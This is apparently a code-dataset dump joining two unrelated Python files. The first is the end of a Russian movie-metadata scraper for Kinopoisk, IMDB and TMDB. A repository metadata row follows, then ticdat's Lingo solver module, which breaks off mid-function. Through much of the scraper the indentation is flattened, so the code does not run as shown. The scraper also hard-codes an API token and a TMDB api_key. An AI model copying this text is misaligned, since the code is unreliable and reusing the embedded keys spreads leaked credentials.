res.path, res.params, res.query, res.fragment)
cache_url = urlparse.urlunparse(res)
#print cache_url
r = self.session.get(cache_url, headers=headers, timeout=2.0)
indx = r.text.find('<html')
resp = Object()
resp.status_code = r.status_code
resp.text = r.text[indx:]
return resp
except BaseException as e:
debug(str(e))
return requests.Response()
def makeSoup(self):
if self.kinopoisk_url and self.soup is None:
r = self._http_get(self.kinopoisk_url)
if r.status_code == requests.codes.ok:
text = base.clean_html(r.content)
self.soup = BeautifulSoup(text, 'html.parser')
else:
pass
def title(self):
title = None
self.makeSoup()
if self.soup:
s = self.soup.find('span', class_='moviename-title-wrapper')
if s:
title = s.get_text().strip('\t\r\n ')
return title
def originaltitle(self):
title = None
self.makeSoup()
if self.soup:
span = self.soup.find('span', attrs = {'itemprop': 'alternativeHeadline'})
if span:
title = span.get_text().strip('\t\r\n ')
return title
def year(self):
self.makeSoup()
if self.soup:
for a in self.soup.find_all('a'):
if '/lists/m_act%5Byear%5D/' in a.get('href', ''):
return a.get_text()
raise AttributeError
def director(self):
self.makeSoup()
if self.soup:
#<td itemprop="director"><a href="/name/535852/" data-popup-info="enabled">Роар Утхауг</a></td>
td = self.soup.find('td', attrs={"itemprop": "director"})
if td:
return [ a.get_text() for a in td.find_all('a') if '/name' in a['href'] ]
raise AttributeError
def plot(self):
plot = None
self.makeSoup()
if self.soup:
div = self.soup.find('div', attrs={"itemprop": "description"})
if div:
plot = div.get_text().replace(u'\xa0', u' ')
return plot
raise AttributeError
def base_actors_list(self):
actors = []
self.makeSoup()
if self.soup:
for li in self.soup.find_all('li', attrs={'itemprop': 'actors'}):
a = li.find('a')
if a:
actors.append(a.get_text())
if '...' in actors:
actors.remove('...')
if actors:
return ', '.join(actors)
else:
return ''
def actors(self):
if self._actors is not None:
return self._actors
self._actors = []
if self.kinopoisk_url:
cast_url = self.kinopoisk_url + 'cast/'
r = self._http_get(cast_url)
if r.status_code == requests.codes.ok:
text = base.clean_html(r.text)
soup = BeautifulSoup(text, 'html.parser')
if not soup:
return []
for actorInfo in soup.find_all('div', class_='actorInfo'):
photo = actorInfo.select('div.photo a')[0]['href']
#http://st.kp.yandex.net/images/actor_iphone/iphone360_30098.jpg
#/name/7627/
photo = photo.replace('/', '').replace('name', '')
photo = 'http://st.kp.yandex.net/images/actor_iphone/iphone360_' + photo + '.jpg'
ru_name = actorInfo.select('div.info .name a')[0].get_text()
en_name = actorInfo.select('div.info .name span')[0].get_text()
role = actorInfo.select('div.info .role')[0].get_text().replace('... ', '')
role = role.split(',')[0]
self._actors.append({'photo': photo,'ru_name': ru_name,'en_name': en_name,'role': role})
return self._actors
def __trailer(self, element):
for parent in element.parents:
#debug(parent.tag)
if parent.name == 'tr':
for tr in parent.next_siblings:
if not hasattr(tr, 'select'):
continue
if tr.name != 'tr':
continue
for a_cont in tr.select('a.continue'):
if u'Высокое качество' in a_cont.get_text():
trailer = a_cont['href']
trailer = re.search('link=(.+?)$', trailer).group(1)
try:
debug('trailer: ' + trailer)
except:
pass
return trailer
return None
def trailer(self):
if self.kinopoisk_url:
trailer_page = self.kinopoisk_url + 'video/type/1/'
r = self._http_get(trailer_page)
if r.status_code == requests.codes.ok:
text = base.clean_html(r.text)
soup = BeautifulSoup(text, 'html.parser')
if not soup:
return None
for div in soup.select('tr td div div.flag2'):
trailer = self.__trailer(div)
if trailer:
return trailer
for a in soup.select('a.all'):
return self.__trailer(a)
return None
def poster(self):
raise AttributeError
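# Hedged usage sketch (editorial addition): the scraper is lazy, so nothing is
# fetched until one of the page-backed methods below is called.
def _example_kinopoisk_usage(settings=None):
	kp = KinopoiskAPI('http://www.kinopoisk.ru/film/301/', settings)
	return {
		'title': kp.title(),                # Russian title, or None if the page failed to load
		'originaltitle': kp.originaltitle(),
		'actors': kp.actors(),              # list of dicts: photo / ru_name / en_name / role
	}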
class imdb_cast(soup_base):
def __init__(self, url):
		soup_base.__init__(self, url + '/fullcredits')
self._actors = []
@property
def actors(self):
if not self._actors:
tbl = self.soup.find('table', class_='cast_list')
if tbl:
				for tr in tbl.find_all('tr'):
					if tr.get('class'):
						act = {}
						# TODO: populate ``act`` (photo / name / role) from the row; extraction is not implemented yet.
						# https://images-na.ssl-images-amazon.com/images/M/MV5BMTkxMzk2MDkwOV5BMl5BanBnXkFtZTcwMDAxODQwMg@@._V1_UX32_CR0,0,32,44_AL_.jpg
						# https://images-na.ssl-images-amazon.com/images/M/MV5BMjExNzA4MDYxN15BMl5BanBnXkFtZTcwOTI1MDAxOQ@@._V1_SY1000_CR0,0,721,1000_AL_.jpg
						# https://images-na.ssl-images-amazon.com/images/M/MV5BMjExNzA4MDYxN15BMl5BanBnXkFtZTcwOTI1MDAxOQ@@._V1_UY317_CR7,0,214,317_AL_.jpg
						#img = tr.find('img')
		return self._actors
class ImdbAPI(object):
def __init__(self, imdb_id):
headers = { 'Accept-Language': 'ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7' }
resp = requests.get('http://www.imdb.com/title/' + imdb_id + '/', headers=headers)
if resp.status_code == requests.codes.ok:
text = base.clean_html(resp.content)
self.page = BeautifulSoup(text, 'html.parser')
def year(self):
a = self.page.select_one('#titleYear > a')
if a:
return a.get_text()
else:
raise AttributeError
def rating(self):
span = self.page.find('span', attrs={'itemprop':'ratingValue'})
if span:
return span.get_text().replace(',', '.')
else:
raise AttributeError
def runtime(self):
t = self.page.find('time', attrs={'itemprop':'duration'})
if t:
return t['datetime'].replace('PT', '').replace('M', '')
else:
raise AttributeError
def mpaa(self):
rt = self.page.find('meta', attrs={'itemprop':'contentRating'})
if rt:
return 'Rated ' + rt['content']
else:
raise AttributeError
def title(self):
# <h1 itemprop="name" class="">
h1 = self.page.find('h1', attrs={'itemprop':'name'})
if h1:
return unicode( h1.contents[0] ).replace(u'\xa0', u' ').strip()
else:
raise AttributeError
def originaltitle(self):
import re
meta = self.page.find('meta', attrs={'property': 'og:title'})
if meta:
otitle = meta['content']
otitle = re.sub(r'\(\d+\)', '', otitle)
otitle = otitle.split('(TV')[0]
return otitle.strip()
raise AttributeError
def type(self):
# <div class="bp_heading">Episode Guide</div>
for div in self.page.find_all('div', class_="bp_heading"):
if div.get_text() == 'Episode Guide':
return 'tvshow'
return 'movie'
class KinopoiskAPI2(KinopoiskAPI):
movie_cc = {}
token = '037313259a17be837be3bd04a51bf678'
def __init__(self, kinopoisk_url = None, settings = None):
if kinopoisk_url:
self.kp_id = IDs.id_by_kp_url(kinopoisk_url)
return super(KinopoiskAPI2, self).__init__(kinopoisk_url, settings)
else:
self.kp_id = None
@property
def data_cc(self):
if self.kp_id is None:
return {}
if self.kp_id in self.movie_cc:
return self.movie_cc[self.kp_id]
url = 'http://getmovie.cc/api/kinopoisk.json?id=%s&token=%s' % (self.kp_id, self.token)
r = requests.get(url)
if r.status_code == requests.codes.ok:
self.movie_cc[self.kp_id] = r.json()
return self.movie_cc[self.kp_id]
return {}
def title(self):
return self.data_cc.get('name_ru')
def originaltitle(self):
return self.data_cc.get('name_en')
def year(self):
return self.data_cc.get('year')
def plot(self):
return self.data_cc.get('description') #.replace('<br/>', '<br/>')
def actors(self):
if self._actors is not None:
return self._actors
self._actors = []
creators = self.data_cc.get('creators')
if creators:
for actor in creators.get('actor', []):
self._actors.append({'photo': actor.get("photos_person"),
'ru_name': actor.get("name_person_ru"),'en_name': actor.get("name_person_en")})
return self._actors
def trailer(self):
return self.data_cc.get('trailer')
def poster(self):
return 'https://st.kp.yandex.net/images/film_big/{}.jpg'.format(self.kp_id)
class TMDB_API(object):
api_url = 'https://api.themoviedb.org/3'
tmdb_api_key = get_tmdb_api_key()
@staticmethod
def url_imdb_id(idmb_id):
url = 'http://%s/3/find/%s?api_key=%s&language=ru&external_source=imdb_id' % (TMDB_API.tmdb_api_key['host'], idmb_id, TMDB_API.tmdb_api_key['key'])
tmdb_data = json.load(urllib2.urlopen( url ))
for type in ['movie', 'tv']:
try:
id = tmdb_data['%s_results' % type][0]['id']
return 'http://%s/3/' % TMDB_API.tmdb_api_key['host'] + type + '/' + str(id) + '?api_key=' + TMDB_API.tmdb_api_key['key'] + '&language=ru&append_to_response=credits'
except: pass
return None
@staticmethod
def search(title):
url = 'http://%s/3/search/movie?query=' % TMDB_API.tmdb_api_key['host'] + urllib2.quote(title.encode('utf-8')) + '&api_key=' + TMDB_API.tmdb_api_key['key'] + '&language=ru'
movies = TMDB_API.tmdb_query(url)
url = 'http://%s/3/search/tv?query=' % TMDB_API.tmdb_api_key['host'] + urllib2.quote(title.encode('utf-8')) + '&api_key=' + TMDB_API.tmdb_api_key['key'] + '&language=ru'
tv = TMDB_API.tmdb_query(url, 'tv')
return movies + tv
@staticmethod
def tmdb_query(url, type='movie'):
class tmdb_query_result(object):
def __init__(self):
self.result = []
self.total_pages = None
def append(self, item):
self.result.append(item)
def __iter__(self):
for x in self.result:
yield x
def __add__(self, other):
r = tmdb_query_result()
r.result = self.result + other.result
return r
def __len__(self):
return len(self.result)
def __getitem__(self, index):
return self.result[index]
result = tmdb_query_result()
try:
debug('Request is: ' + url)
data = json.load(urllib2.urlopen(url))
debug(u'data is: ' + unicode(data))
except urllib2.HTTPError as e:
debug('Error TMDB request')
debug(e)
return tmdb_query_result()
if "total_pages" in data:
result.total_pages = data["total_pages"]
for tag in ['results', 'movie_results', 'tv_results']:
if tag in data:
for r in data[tag]:
if not r['overview']:
continue
if '_results' in tag:
type = tag.replace('_results', '')
url2 = 'http://%s/3/' % TMDB_API.tmdb_api_key['host'] + type + '/' + str(
r['id']) + '?api_key=' + TMDB_API.tmdb_api_key['key'] + '&language=ru&append_to_response=credits,videos,external_ids'
data2 = json.load(urllib2.urlopen(url2))
if 'imdb_id' in data2:
result.append(tmdb_movie_item(data2, type))
elif 'external_ids' in data2 and 'imdb_id' in data2['external_ids']:
result.append(tmdb_movie_item(data2, type))
return result
@staticmethod
def tmdb_by_imdb(imdb, type):
url = 'http://%s/3/find/' % TMDB_API.tmdb_api_key['host'] + imdb + '?external_source=imdb_id&api_key=' + TMDB_API.tmdb_api_key['key'] + '&language=ru'
url += '&append_to_response=credits,videos,external_ids'
debug(url)
return TMDB_API.tmdb_query(url, type)
@staticmethod
def popular(page=1):
url = 'http://%s/3/movie/popular?api_key=' % TMDB_API.tmdb_api_key['host'] + TMDB_API.tmdb_api_key['key'] + '&language=ru'
url += '&page={}'.format(page)
return TMDB_API.tmdb_query(url)
@staticmethod
def popular_tv(page=1):
url = 'http://%s/3/tv/popular?api_key=' % TMDB_API.tmdb_api_key['host'] + TMDB_API.tmdb_api_key['key'] + '&language=ru'
url += '&page={}'.format(page)
return TMDB_API.tmdb_query(url, 'tv')
@staticmethod
def top_rated(page=1):
url = 'http://%s/3/movie/top_rated?api_key=' % TMDB_API.tmdb_api_key['host'] + TMDB_API.tmdb_api_key['key'] + '&language=ru'
url += '&page={}'.format(page)
return TMDB_API.tmdb_query(url)
@staticmethod
def top_rated_tv(page=1):
url = 'http://%s/3/tv/top_rated?api_key=' % TMDB_API.tmdb_api_key['host'] + TMDB_API.tmdb_api_key['key'] + '&language=ru'
url += '&page={}'.format(page)
return TMDB_API.tmdb_query(url, 'tv')
@staticmethod
def show_similar_t(page, tmdb_id, type):
url = 'http://%s/3/' % TMDB_API.tmdb_api_key['host'] + type + '/' + str(
tmdb_id) + '/similar?api_key=' + TMDB_API.tmdb_api_key['key'] + '&language=ru'
url += '&page={}'.format(page)
log.debug(url)
return TMDB_API.tmdb_query(url, type)
@staticmethod
def show_similar(tmdb_id):
return TMDB_API.show_similar_t(1, tmdb_id, 'movie') + TMDB_API.show_similar_t(1, tmdb_id, 'tv')
@staticmethod
def imdb_by_tmdb_search(orig, year):
try:
for res in TMDB_API.search(orig):
r = res.json_data_
release_date = r.get('release_date')
if year and release_date and year not in release_date:
continue
r_title = r.get('title')
r_original_title = r.get('original_title')
if orig and ( orig == r_title or orig == r_original_title):
return r['imdb_id']
except BaseException as e:
from log import print_tb
print_tb(e)
return None
def __init__(self, imdb_id = None):
if imdb_id:
url_ = TMDB_API.url_imdb_id(imdb_id)
try:
if url_:
self.tmdb_data = json.load(urllib2.urlopen( url_ ))
debug('tmdb_data (' + url_ + ') \t\t\t[Ok]')
else:
self.tmdb_data = None
except:
self.tmdb_data = None
def title(self):
try:
if 'title' in self.tmdb_data:
return self.tmdb_data['title']
if 'name' in self.tmdb_data:
return self.tmdb_data['name']
except:
pass
raise AttributeError
def originaltitle(self):
try:
if 'original_title' in self.tmdb_data:
return self.tmdb_data['original_title']
if 'original_name' in self.tmdb_data:
return self.tmdb_data['original_name']
except:
pass
raise AttributeError
def year(self):
try:
return self.tmdb_data['release_date'].split('-')[0]
except:
raise AttributeError
def poster(self):
return u'http://image.tmdb.org/t/p/original' + self.tmdb_data[u'poster_path']
def fanart(self):
return u'http://image.tmdb.org/t/p/original' + self.tmdb_data[u'backdrop_path']
def set(self):
try:
if u'belongs_to_collection' in self.tmdb_data:
belongs_to_collection = self.tmdb_data[u'belongs_to_collection']
if belongs_to_collection and u'name' in belongs_to_collection:
return belongs_to_collection[u'name']
except:
pass
raise AttributeError
def runtime(self):
return self.tmdb_data['runtime']
def tag(self):
return self.tmdb_data[u'tagline']
def plot(self):
return self.tmdb_data['overview']
def actors(self):
try:
cast = self.tmdb_data['credits']['cast']
except AttributeError:
return []
result = []
for actor in cast:
res = {}
res['en_name'] = actor['name']
if actor.get('profile_path'):
res['photo'] = 'http://image.tmdb.org/t/p/original' + actor['profile_path']
if actor.get('character'):
res['role'] = actor['character']
if actor.get('order'):
res['order'] = actor['order']
result.append(res)
return result
def genres(self):
ll = [g['name'] for g in self.tmdb_data['genres']]
return ll
def countries(self):
from countries import ru
cc = [c['iso_3166_1'] for c in self.tmdb_data['production_countries']]
return [ru(c) for c in cc]
def studios(self):
ss = [ s['name'] for s in self.tmdb_data['production_companies']]
return ss
class MovieAPI(object):
APIs = {}
@staticmethod
def get_by(imdb_id = None, kinopoisk_url = None, orig=None, year=None, imdbRaiting=None, settings = None):
if not imdb_id:
imdb_id = IDs.get_by_kp(kinopoisk_url) if kinopoisk_url else None
if not imdb_id:
try:
_orig = orig
_year = year
if kinopoisk_url:
kp = KinopoiskAPI(kinopoisk_url, settings)
orig = kp.originaltitle()
if not orig:
orig = kp.title()
year = kp.year()
imdb_id = TMDB_API.imdb_by_tmdb_search(orig if orig else _orig, year if year else _year)
except BaseException as e:
from log import print_tb
print_tb(e)
if imdb_id and kinopoisk_url:
IDs.set( imdb_id, kinopoisk_url)
if imdb_id and imdb_id in MovieAPI.APIs:
return MovieAPI.APIs[imdb_id], imdb_id
elif kinopoisk_url and kinopoisk_url in MovieAPI.APIs:
return MovieAPI.APIs[kinopoisk_url], imdb_id
api = MovieAPI(imdb_id, kinopoisk_url, settings, orig, year)
if imdb_id:
MovieAPI.APIs[imdb_id] = api
elif kinopoisk_url:
MovieAPI.APIs[kinopoisk_url] = api
return api, imdb_id
def __init__(self, imdb_id = None, kinopoisk = None, settings = None, orig = None, year=None):
self.providers = []
self.tmdbapi = None
self.imdbapi = None
self.kinopoiskapi = None
self.worldartapi = None
self._actors = None
if imdb_id:
self.tmdbapi = TMDB_API(imdb_id)
self.imdbapi = ImdbAPI(imdb_id)
self.providers = [self.tmdbapi, self.imdbapi]
if not self.tmdbapi.tmdb_data:
self.providers.remove(self.tmdbapi)
if kinopoisk:
if not settings or settings.use_kinopoisk:
self.kinopoiskapi = KinopoiskAPI(kinopoisk, settings)
self.providers.append(self.kinopoiskapi)
if imdb_id or kinopoisk:
if not settings or settings.use_worldart:
if not orig:
for api in self.providers:
try:
orig = api.originaltitle()
break
except:
pass
try:
self.worldartapi = world_art(orig, imdbid=imdb_id, kp_url=kinopoisk)
self.providers.append(self.worldartapi)
except:
pass
def actors(self):
if self._actors is not None:
return self._actors
actors = []
for api in [ self.kinopoiskapi, self.tmdbapi, self.worldartapi ]:
if api:
a = api.actors()
if a:
actors.append(a)
if len(actors) > 0:
self._actors = [ actor.copy() for actor in actors[0] ]
else:
self._actors = []
for act in self._actors:
for variant in actors[1:]:
for add in variant:
try:
if act['en_name'] == add['en_name']:
act.update(add)
except KeyError:
pass
return self._actors
def __getitem__(self, key):
for api in self.providers:
try:
res = api.__getattribute__(key)
if res:
return res()
except BaseException as e:
continue
raise AttributeError
def get(self, key, default=None):
try:
return self.__getitem__(key)
except AttributeError:
return default
def __getattr__(self, name):
if name.startswith('_') or name in self.__dict__:
return object.__getattribute__(self, name)
for api in self.providers:
try:
res = api.__getattribute__(name)
if res:
return res
except AttributeError:
continue
raise AttributeError
def ru(self, name):
def ru_text(text):
if not text:
return False
r = 0
nr = 0
for ch in text:
if ch >= u'А' and ch <= u'Я':
r += 1
elif ch >= u'а' and ch <= u'я':
r += 1
else:
nr += 1
return r > nr
def ru_list(ll):
for l in ll:
if ru_text(l):
return True
return False
for api in self.providers:
try:
res = api.__getattribute__(name)
if res and callable(res):
value = res()
if isinstance(value, list):
if ru_list(value):
return value
else:
if ru_text(value):
return value
except AttributeError:
continue
raise AttributeError
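# Illustrative usage sketch (not part of the original module; the URL below is
# hypothetical and network access is assumed).  MovieAPI.get_by first tries to
# resolve an IMDB id, then aggregates the available metadata providers:
#
#   api, imdb_id = MovieAPI.get_by(
#       kinopoisk_url='https://www.kinopoisk.ru/film/894027/', settings=settings)
#   title = api.get('title')    # first provider returning a value wins
#   actors = api.actors()       # actor dicts merged across providers by 'en_name'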
if __name__ == '__main__':
#for res in MovieAPI.search(u'Обитаемый остров'):
# print res.get_info()
#for res in MovieAPI.popular_tv():
# print res.get_info()
#MovieAPI.tmdb_query(
# 'http://api.themoviedb.org/3/movie/tt4589186?api_key=f7f51775877e0bb6703520952b3c7840&language=ru')
#api = MovieAPI(kinopoisk = 'https://www.kinopoisk.ru/film/894027/')
#api = MovieAPI(kinopoisk = 'https://www.kinopoisk.ru/film/257774/')
#api = world_art(title=u"Команда Тора")
from settings import Settings
settings = Settings('.')
settings.kp_usezaborona = True
api = KinopoiskAPI('https://www.kinopoisk.ru/film/257774/', settings)
title = api.title()
api = world_art(u'The Fate of the Furious', year='2017', kp_url='https://www.kinopoisk.ru/film/894027/')
info = api.info
knowns = info.knowns
plot = info.plot
actors = [act for act in info.actors]
pass
| gpl-3.0 | -896,833,385,007,039,600 | 24.823933 | 174 | 0.631475 | false |
opalytics/opalytics-ticdat | ticdat/lingo.py | 1 | 14369 | from ticdat.utils import verify, containerish, stringish, find_duplicates_from_dict_ticdat
from ticdat.utils import find_case_space_duplicates
import ticdat.utils as tu
from ticdat.ticdatfactory import TicDatFactory
import os, subprocess, inspect, time, uuid, shutil
from collections import defaultdict
from ticdat.jsontd import make_json_dict
INFINITY = 999999
def _code_dir():
return os.path.dirname(os.path.abspath(inspect.getsourcefile(_code_dir)))
def lingo_run(lng_file, input_tdf, input_dat, soln_tdf, infinity=INFINITY, runlingo_path=None):
"""
    solve an optimization problem using a Lingo .lng file
    :param lng_file: A Lingo .lng file.
:param input_tdf: A TicDatFactory defining the input schema
:param input_dat: A TicDat object consistent with input_tdf
:param soln_tdf: A TicDatFactory defining the solution variables
:param infinity: A number used to represent infinity in Lingo
:param runlingo_path: A path to the runlingo executable
:return: a TicDat object consistent with soln_tdf, or None if no solution found
"""
verify(os.path.isfile(lng_file), "lng_file %s is not a valid file."%lng_file)
verify(not find_case_space_duplicates(input_tdf),
"There are case space duplicate field names in the input schema.")
verify(not find_case_space_duplicates(soln_tdf),
"There are case space duplicate field names in the solution schema.")
verify(len({input_tdf.lingo_prepend + t for t in input_tdf.all_tables}.union(
{soln_tdf.lingo_prepend + t for t in soln_tdf.all_tables})) ==
len(input_tdf.all_tables) + len(soln_tdf.all_tables),
"There are colliding input and solution table names.\nSet lingo_prepend so " +
"as to insure the input and solution table names are effectively distinct.")
msg = []
verify(input_tdf.good_tic_dat_object(input_dat, msg.append),
"tic_dat not a good object for the input_tdf factory : %s"%"\n".join(msg))
mapping = _try_create_space_case_mapping(input_tdf, input_dat)
verify("failures" not in mapping, "The following case-space mapping data collisions were found.\n%s"%
mapping.get("failures"))
input_dat = _apply_space_case_mapping(input_tdf, input_dat, {v:k for k,v in mapping["mapping"].items()})
orig_input_tdf, orig_soln_tdf = input_tdf, soln_tdf
input_dat = input_tdf.TicDat(**make_json_dict(orig_input_tdf, input_dat))
assert input_tdf.good_tic_dat_object(input_dat)
lng_file_name = os.path.basename(lng_file)[:-4]
with open(lng_file, "r") as f:
lng = f.read()
assert ("ticdat_" + lng_file_name + ".lng") in lng
assert ("ticdat_" + lng_file_name + "_output.ldt") in lng
assert ("ticdat_" + lng_file_name + ".ldt") in lng
working_dir = os.path.abspath(os.path.dirname(lng_file))
if tu.development_deployed_environment:
working_dir = os.path.join(working_dir, "lingoticdat_%s"%uuid.uuid4())
shutil.rmtree(working_dir, ignore_errors = True)
os.mkdir(working_dir)
working_dir = os.path.abspath(working_dir)
_ = os.path.join(working_dir, os.path.basename(lng_file))
shutil.copy(lng_file, _)
lng_file = _
commandsfile = os.path.join(working_dir, "ticdat_"+lng_file_name+".ltf")
ldtfile = os.path.join(working_dir, "ticdat_"+lng_file_name+".ldt")
output_txt = os.path.join(working_dir, "output.txt")
soln_tables = {t for t, pk in soln_tdf.primary_key_fields.items() if pk}
results = []
for tbn in soln_tables:
fn = os.path.join(working_dir, tbn+".ldt")
if os.path.isfile(fn):
os.remove(fn)
results.append(fn)
with open(ldtfile, "w") as f:
f.write(create_lingo_text(input_tdf, input_dat, infinity))
verify(os.path.isfile(ldtfile), "Could not create ticdat_" + lng_file_name+".ldt")
with open(os.path.join(working_dir, "ticdat_"+lng_file_name+".lng"), "w") as f:
f.write("! Autogenerated input file, created by lingo.py on " + time.asctime() + " ;\n")
f.write(create_lingo_mod_text(orig_input_tdf))
with open(os.path.join(working_dir,"ticdat_"+lng_file_name+"_output.ldt"), "w") as f:
f.write("! Autogenerated output file, created by lingo.py on " + time.asctime() + " ;\n")
f.write(create_lingo_output_text(orig_soln_tdf))
commands = [
"! Autogenerated commands file, created by lingo.py on " + time.asctime() + " ;",
"TAKE " + lng_file,
"GO",
"QUIT"
]
with open(commandsfile, "w") as f:
f.write("\n".join(commands))
if not runlingo_path:
if 'TICDAT_LINGO_PATH' in os.environ:
runlingo_path = os.environ['TICDAT_LINGO_PATH']
else:
verify_str = "need to either pass runlingo_path argument or run lingo_run_setup.py"
if tu.development_deployed_environment:
verify_str = "Could not find runlingo. Make sure the Application Type is set correctly"
verify(os.path.isfile(os.path.join(_code_dir(),"runlingo_path.txt")), verify_str)
with open(os.path.join(_code_dir(),"runlingo_path.txt"),"r") as f:
runlingo_path = f.read().strip()
verify(os.path.isfile(runlingo_path), "%s not a valid path to runlingo"%runlingo_path)
output = ''
try:
output = subprocess.check_output([runlingo_path, commandsfile], stderr=subprocess.STDOUT, cwd=working_dir)
except subprocess.CalledProcessError as err:
if tu.development_deployed_environment:
raise Exception("runlingo failed to complete: " + str(err.output))
with open(output_txt, "w") as f:
f.write(str(output))
output_data = {}
for i in zip(soln_tables,results):
if not os.path.isfile(i[1]):
print("%s is not a valid file. A solution was likely not generated. Check 'output.txt' for details."%i[1])
return None
with open(i[1], "r") as f:
output_data[i[0]] = f.read()
rtn = read_lingo_text(soln_tdf, output_data)
return _apply_space_case_mapping(soln_tdf, rtn, mapping["mapping"])
_can_run_lingo_run_tests = os.path.isfile(os.path.join(_code_dir(),"runlingo_path.txt")) or "TICDAT_LINGO_PATH" in os.environ
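# Minimal usage sketch (illustrative only, not part of the original module).
# The "diet.lng" model and the table/field names below are hypothetical, and a
# working runlingo installation is assumed:
#
#   input_tdf = TicDatFactory(foods=[["Name"], ["Cost"]])
#   input_dat = input_tdf.TicDat(foods={"pizza": {"Cost": 2.5}})
#   soln_tdf = TicDatFactory(buy=[["Name"], ["Quantity"]])
#   soln = lingo_run("diet.lng", input_tdf, input_dat, soln_tdf)
#   if soln is not None:
#       print(soln.buy)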
def create_lingo_output_text(tdf):
"""
    Generate a Lingo output .ldt string from a TicDatFactory.
:param tdf: A TicDatFactory defining the output schema
:return: A string consistent with the Lingo .ldt format
"""
prepend = getattr(tdf, "lingo_prepend", "")
dict_tables = {t for t, pk in tdf.primary_key_fields.items() if pk}
rtn = 'data:\n'
for tbn in dict_tables:
p_tbn = prepend + tbn
rtn += '\t@TEXT(\"' + tbn + ".ldt\") = " + p_tbn
for fk in tdf.data_fields[tbn]:
rtn += ", " + p_tbn + "_" + fk.lower().replace(" ","")
rtn += ";\n"
rtn += 'enddata'
return rtn
def create_lingo_text(tdf, tic_dat, infinity=INFINITY):
"""
Generate a Lingo .ldt string from a TicDat object
:param tdf: A TicDatFactory defining the schema
:param tic_dat: A TicDat object consistent with tdf
:param infinity: A number used to represent infinity in lingo
:return: A string consistent with the Lingo .ldt format
"""
msg = []
verify(tdf.good_tic_dat_object(tic_dat, msg.append),
"tic_dat not a good object for this factory : %s"%"\n".join(msg))
verify(not tdf.generator_tables, "doesn't work with generator tables.")
verify(not tdf.generic_tables, "doesn't work with generic tables. (not yet - will add ASAP as needed) ")
dict_with_lists = defaultdict(list)
dict_tables = {t for t,pk in tdf.primary_key_fields.items() if pk}
prepend = getattr(tdf, "lingo_prepend", "")
for t in dict_tables:
for k,r in getattr(tic_dat, t).items():
row = list(k) if containerish(k) else [k]
for f in tdf.data_fields.get(t, []):
row.append(r[f])
dict_with_lists[t].append(row)
for t in set(tdf.all_tables).difference(dict_tables):
for r in getattr(tic_dat, t):
row = [r[f] for f in tdf.data_fields[t]]
dict_with_lists[t].append(row)
rtn = "data:\n"
for t in _sorted_tables(tdf):
rtn += "%s"%(prepend + t)
for field in tdf.data_fields[t]:
rtn += ',' + prepend + t + "_" + field.replace(" ", "_").lower()
rtn += "=\n"
for row in dict_with_lists[t]:
rtn += "\t"
for field in row:
if stringish(field):
rtn += field + " "
else:
                    rtn += (str(infinity) if float('inf') == field else str(field)) + " "
rtn += "\n"
rtn += ";\n"
rtn+="enddata"
return rtn
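# For illustration (hypothetical one-table schema, not from the original code):
# with a table "foods" keyed on "Name" and carrying a "Cost" field, the text
# produced above looks roughly like
#
#   data:
#   foods,foods_cost=
#       pizza 2.5
#   ;
#   enddata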
def create_lingo_mod_text(tdf):
"""
    Generate a Lingo .lng string from a TicDatFactory for diagnostic purposes
:param tdf: A TicDatFactory defining the input schema
:return: A string consistent with the Lingo .lng input format
"""
verify(not find_case_space_duplicates(tdf), "There are case space duplicate field names in the schema.")
verify(not tdf.generator_tables, "Input schema error - doesn't work with generator tables.")
verify(not tdf.generic_tables, "Input schema error - doesn't work with generic tables. (not yet - will \
add ASAP as needed) ")
rtn = 'sets:\n'
dict_tables = {t for t, pk in tdf.primary_key_fields.items() if pk}
verify(set(dict_tables) == set(tdf.all_tables), "not yet handling non-PK tables of any sort")
prepend = getattr(tdf, "lingo_prepend", "")
def get_table_as_mod_text(tdf, tbn):
p_tbn = prepend + tbn
rtn = p_tbn
if len(tdf.primary_key_fields[tbn]) > 1:
fkr = []
for i in range(len(tdf.primary_key_fields[tbn])):
pk = tdf.primary_key_fields[tbn][i]
fk = list(filter(lambda k: k.native_table == tbn and k.mapping.native_field == pk, tdf.foreign_keys))
                verify(len(fk) == 1, "Table '%s' needs to fully link its primary key fields to parent tables via"
" foreign keys."%tbn)
fkr.append(prepend + fk[0].foreign_table)
rtn += '(' + ','.join(fkr) + ')'
rtn += ':'
fields = []
for df in tdf.data_fields[tbn]:
df_m = p_tbn + '_' + df.replace(' ', '_').lower()
fields.append(df_m)
rtn += ','.join(fields)
rtn += ';\n'
return rtn
for t in _sorted_tables(tdf):
rtn += get_table_as_mod_text(tdf, t)
rtn+='endsets'
return rtn
def read_lingo_text(tdf,results_text):
"""
Read Lingo .ldt strings
:param tdf: A TicDatFactory defining the schema
:param results_text: A list of strings defining Lingo tables
:return: A TicDat object consistent with tdf
"""
for i in results_text.values():
verify(stringish(i), "text needs to be a string")
def _get_as_type(val):
try:
return float(val)
except ValueError:
return val
dict_with_lists = defaultdict(list)
for tbn in results_text:
rows = []
text = results_text[tbn].strip().split("\n")
for line in text:
rows.append(list(map(lambda k: _get_as_type(k),line.strip().split())))
dict_with_lists[tbn] = rows
assert not find_duplicates_from_dict_ticdat(tdf, dict_with_lists), \
"duplicates were found - if asserts are disabled, duplicate rows will overwrite"
return tdf.TicDat(**{k.replace(tdf.lingo_prepend,"",1):v for k,v in dict_with_lists.items()})
def _try_create_space_case_mapping(tdf, ticdat):
'''
:param tdf: a TicDatFactory
:param ticdat: a ticdat for the tdf
:return: {"mapping:mapping} if a good mapping can be made, else {"failures":failures}
'''
assert tdf.good_tic_dat_object(ticdat), "ticdat not a good object for the tdf"
rtn = defaultdict(set)
for t in tdf.all_tables:
if tdf.primary_key_fields.get(t):
for ks in getattr(ticdat, t):
for k in (ks if containerish(ks) else [ks]):
if stringish(k):
newk = ''.join(list(map(lambda c: c.upper() if c.isalnum() else '_', k)))
rtn[newk].add(k)
failures = {k:tuple(sorted(v)) for k,v in rtn.items() if len(v) > 1}
if failures:
return {"failures":failures}
return {"mapping": {k:next(iter(v)) for k,v in rtn.items()}}
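# Example of the mapping produced above (hypothetical data, for illustration):
# a primary key value "New York" becomes the Lingo-safe token "NEW_YORK", i.e.
#   {"mapping": {"NEW_YORK": "New York"}}
# Two keys such as "New York" and "new-york" would collapse to the same token
# and be reported under "failures" instead.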
def _apply_space_case_mapping(tdf, ticdat, mapping):
"""
:param tdf: a TicDatFactory
:param ticdat: a ticdat for the tdf
:param mapping: the mapping returned by an earlier call to _try_create_space_case_mapping.
**Should be the value in the {"mapping":mapping} dict, if such a dict was
returned, and not the {"mapping":mapping} dict itself.
:return:
"""
